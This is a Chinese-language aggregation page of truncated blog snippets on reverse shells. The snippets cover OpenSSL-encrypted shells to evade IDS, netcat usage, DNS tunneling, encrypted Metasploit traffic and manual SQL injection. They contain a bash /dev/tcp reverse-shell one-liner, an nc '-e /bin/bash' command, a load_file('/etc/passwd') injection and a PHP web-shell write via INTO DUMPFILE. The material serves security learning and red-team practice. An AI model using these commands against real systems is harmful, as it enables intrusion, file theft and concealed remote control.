流量加密-Kali使用Openssl反弹shell】的更多相关文章

Kali使用Openssl反弹shell 前言 之前在护网的时候,如果流量中有明文的敏感信息,譬如攻击特征,是很容易被IDS检测出来的,此时红队的攻击行为就会暴露.这是非常危险的一件事.今天我们通过本篇博客来完成使用Openssl反弹shelll来加密流量. 正文 普通反弹shell 首先我们来看不使用流量加密反弹shell,通过wireshark可以明显扑捉到攻击特征. 首先kali开启NC监听: nc -lvvp 8080 然后在受害主机上反弹shell bash -c 'exec bash…
假如ubuntu.CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu.CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp -e /bin/bash kali上输入 nc 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell. 需要目标机安装nc. 反向反弹shell 方法1:bash反弹 bash -i >& /dev…
一.nc简介 nc 被称为瑞士军刀netcat ,所做的就是在两台电脑之间建立链接,并返回两个数据流. 可运行在TCP或者UDP模式,添加参数 -u 则调整为UDP,默认为TCP 即可用在windows系统也可在linux系统,也可作用于二者之间,只是对应的命令有微微差异. 二.nc常用参数 -l    开启监听 -p   指定一个端口 -v   显示详细输出 -e   指定对应的应用程序 -n   nc不要DNS反向查询IP的域名 -z   连接成功后立即关闭连接 三.建立C-S连接 3.1…
MSF使用OpenSSL流量加密 前言 之前在博客里使用了Openssl对流量进行加密,这次我们来复现暗月师傅红队指南中的一篇文章,尝试用OpenSSL对Metasploit的流量进行加密,以此来躲避流量审查,实现渗透的目的. 正文 Kali创建SSL/TLS证书 首先使用Kali创建Openssl的证书,命令如下 openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \ -subj "/C=UK/ST=London/L=London/…
SQL手工注入 1.读取文件[load_file函数] ' union  SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+   [写入一句话木马:INTO DUMPLING:MySQL函数,将输入下载在数据库中]…
DNS介绍 DNS是域名系统(Domain Name System)的缩写,是因特网的一项核心服务,它作为可以将域名和IP地址相互映射的一个分布式数据库,能够使人更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串. DNS的记录类型有很多,有A,AAAA,CNAME,MX,SOA,NS等. DNS Tunneling可以利用其中的一些记录类型来传输数据.例如A,MX,CNAME,TXT,NULL等. A记录:A记录是用来指定主机名对应的ip地址记录,简单的说A记录是指定域名对应的IP地…
反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹.假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接.远程桌面,web服务,ssh,telnet等等,都是正向连接. 那么什么情况下正向连接不太好用了呢?1.某客户机中了你的网马,但是它在局域网内,你直接连接不了.它的ip会动态改变,你不能持续控制.2.由于防火墙等限制,对方机器只能发送请求,不能接收请求.3.对于病毒,木马,…
参考链接 http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html http://www.waitalone.cn/linux-shell-rebound-under-way.html http://roo7break.co.uk/?p=215 http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttp://www.91ri.org/936…
01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波. 02 环境 win10      192.168.43.151       监听端    装有nc kali       192.168.253.128     反弹端    自带nc/bash/curl... 03 Test it 1.bash反弹 ***/dev/[tcp|udp]/host/port是linux设备里面比较特殊的文件,读取或写入相当于建立socket调用*** ***参考文章及更多骚姿势*** 监…
0×01    简介 反弹shell在漏洞证明和利用的过程中都是一个直接有力的手段.由于安全工作或者学习的需要,我们或多或少都会接触到各种反弹shell的命令,于是就有了这个能稍微帮助初学者理解的文档. 下面这个场景十分常见,攻击者在机器上监听相应端口,在受害者机器执行反弹shell命令,然后get shell. 0×02    速食 那么这个反弹shell命令到底是什么意思呢 bash -i >&/dev/tcp/192.168.190.138/6666 0>&1 对于速食主…